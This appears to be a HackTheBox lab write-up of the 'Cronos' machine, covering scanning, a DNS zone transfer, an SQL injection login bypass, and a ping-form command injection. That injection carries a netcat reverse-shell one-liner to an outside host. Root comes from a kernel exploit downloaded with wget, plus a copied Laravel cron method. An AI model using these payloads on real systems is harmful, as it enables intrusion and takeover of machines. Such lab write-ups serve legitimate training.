6 minute read

Introduction

Cronos is a medium box, it is rated 4.5, which is pretty good I think. It should be one of the most OSCP like boxes on the platform, so let’s give it a shot and start with the enumeration.

Enumeration

Nmap Scan

As always I start with a full nmap scan:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ sudo nmap cronos.htb -vv -p- -sS
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 09:49 CEST
Initiating Ping Scan at 09:49
Scanning cronos.htb (10.10.10.13) [4 ports]
Completed Ping Scan at 09:49, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:49
Scanning cronos.htb (10.10.10.13) [65535 ports]
Discovered open port 22/tcp on 10.10.10.13
Discovered open port 53/tcp on 10.10.10.13
Discovered open port 80/tcp on 10.10.10.13
Completed SYN Stealth Scan at 09:51, 106.04s elapsed (65535 total ports)
Nmap scan report for cronos.htb (10.10.10.13)
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2021-08-19 09:49:41 CEST for 106s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
53/tcp open  domain  syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.24 seconds
           Raw packets sent: 131152 (5.771MB) | Rcvd: 86 (3.764KB)

Now, I perform a deep scan on those 3 ports:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ sudo nmap cronos.htb -p 22,53,80 -sV -A -O -sC
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-19 09:54 CEST
Nmap scan report for cronos.htb (10.10.10.13)
Host is up (0.078s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Cronos
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), 
Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%)
Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   96.70 ms 10.10.16.1
2   96.78 ms cronos.htb (10.10.10.13)

Nmap done: 1 IP address (1 host up) scanned in 20.43 seconds

Not many ports, I can now begin to enumerate all the different services.

Enumeration of Services

Port 22

On this port runs SSH, there is no exploit available for this version, so there is no need for further enumeration. I could brute force credentials, but I will wait until I’m completely stuck.

Port 53

On this port runs DNS. So let’s use this DNS to find the subdomains of the host cronos.htb.

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ dig axfr cronos.htb @10.10.10.13

; <<>> DiG 9.16.15-Debian <<>> axfr cronos.htb @10.10.10.13
;; global options: +cmd
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb.
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 
;; Query time: 56 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Thu Aug 19 10:05:05 CEST 2021
;; XFR size: 7 records (messages 1, bytes 203)

So there are 2 interesting subdomains: admin.cronos.htb and ns1.cronos.htb. I’m not sure about ns1, but I still append it to the hosts file:

10.10.10.13     cronos.htb admin.cronos.htb ns1.cronos.htb

Port 80

All hosts in the hosts file are working. Here are the gobuster scan of the 3 websites:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ cat gobuster.txt
/index.php            (Status: 200) [Size: 1547]
/welcome.php          (Status: 302) [Size: 439] [--> index.php]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 0]
/session.php          (Status: 302) [Size: 0] [--> index.php]
/index.html           (Status: 200) [Size: 11439]
/index.php            (Status: 200) [Size: 2319]
/css                  (Status: 301) [Size: 306] [--> http://cronos.htb/css/]
/js                   (Status: 301) [Size: 305] [--> http://cronos.htb/js/]
/robots.txt           (Status: 200) [Size: 24]

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ cat gobuster-sub-ns1.txt   
/index.html           (Status: 200) [Size: 11439]

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ cat gobuster-sub-admin.txt 
/index.php            (Status: 200) [Size: 1547]
/welcome.php          (Status: 302) [Size: 439] [--> index.php]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 0]
/session.php          (Status: 302) [Size: 0] [--> index.php]

I visited the all the pages, but I found nothing. So I will need to continue with the login form on the admin page.

Exploitation

SQL Injection

I tried to perform an SQL Injection on the login form:

First, I just tried to log in with admin:admin, but that does not work. So I tried admin’:admin’ to check for an SQL Injection. But also no success. So I used the cheat sheet from above portswinger:

Untitled

At first, it did not work, so I tried it with the username admin and then the SQL Injection code, and it worked.

I’m now forwarded to a website where I can ping an IP address. That works fine, but I wanted to catch the request. I sent it to the repeater in order to maintain the current request after sending it to the server:

Untitled

That works too, let’s try another command (I sent it back to the browser for a better view), I tried the ls command:

Untitled

Using the “&” sign, you can add a second command that will be executed. With this, I can get a reverse shell.

8.8.8.8 & rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|/bin/nc 10.10.17.28 4444 >/tmp/f

I look at the netcat listener:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.13] 34044
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

A shell as www-data spawned.

User Flag

I should be able to read the userflag:

www-data@cronos:/$ cd /home
www-data@cronos:/home$ ls
noulis
www-data@cronos:/home$ cd noulis
www-data@cronos:/home/noulis$ ls
user.txt
www-data@cronos:/home/noulis$ cat user.txt
51**************************e33b

Privilege Escalation

There is a kernel exploit for this version of linux:

Offensive Security’s Exploit Database Archive

So I download it, compile it and start a web server:

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ ls
44298.c  gobuster-sub-admin.txt  gobuster-sub-ns1.txt  gobuster.txt

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ gcc 44298.c

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ ls
44298.c  a.out  gobuster-sub-admin.txt  gobuster-sub-ns1.txt  gobuster.txt

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ mv a.out 44298

┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/cronos]
└─$ sudo python3 -m http.server 80                
[sudo] password for user: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.13 - - [19/Aug/2021 13:42:10] "GET /44298 HTTP/1.1" 200 -

Download the exploit on the target machine:

www-data@cronos:/tmp$ wget http://10.10.17.28/44298
---[snip]---
www-data@cronos:/tmp$ chmod +x 44298                        
www-data@cronos:/tmp$ ls -l
total 44                                                   
---x--x--x 1 www-data www-data 17872 Aug 19 14:41 44298
---[snip]---

Now, run the exploit code:

www-data@cronos:/tmp$ ./44298 
task_struct = ffff88003d717000
uidptr = ffff88003d5930c4
spawning root shell
root@cronos:/tmp# whoami
root

A shell as root spawned.

Root Flag

Using this root shell, I should be able to read the root flag:

root@cronos:/tmp# cd /root
root@cronos:/root# ls
root.txt
root@cronos:/root# cat root.txt
17**************************d3a0

Other Way To Get Root

I found another way to get a root shell, but I got stuck after finding the script in the crontab file. I thought it would be a path manipulation, but it did not work. Here is this other way, I copied it from this write up:

HackTheBox Cronos Walkthrough

Here is the other way to get a root shell:

Getting into the /tmp directory and pulling down our enumeration script:

https://sevenlayers.com/images/blogimages/2018/Cronos/image027.jpg

Looking at the results….

https://sevenlayers.com/images/blogimages/2018/Cronos/image028.jpg

We find an interesting looking cronjob.

(I found two ways to root this box.  As far as I can tell, the laravel scheduler is the intended method.  I’m not sure about the other method which I will get to in a moment.)

I do some looking around and it appears that our schedule is setup through Kernel.php, we search for it:

https://sevenlayers.com/images/blogimages/2018/Cronos/image029.jpg

More digging around and I find the correct syntax for scheduling shell commands:

https://sevenlayers.com/images/blogimages/2018/Cronos/image030.jpg

I edit Kernel.php and add the $schedule line:

https://sevenlayers.com/images/blogimages/2018/Cronos/image031.jpg

I should mention that I’ve copied over the shell and placed it into /tmp.  I setup my listener and I wait a minute, literally “everyMinute”:

https://sevenlayers.com/images/blogimages/2018/Cronos/image032.jpg

You May Also Enjoy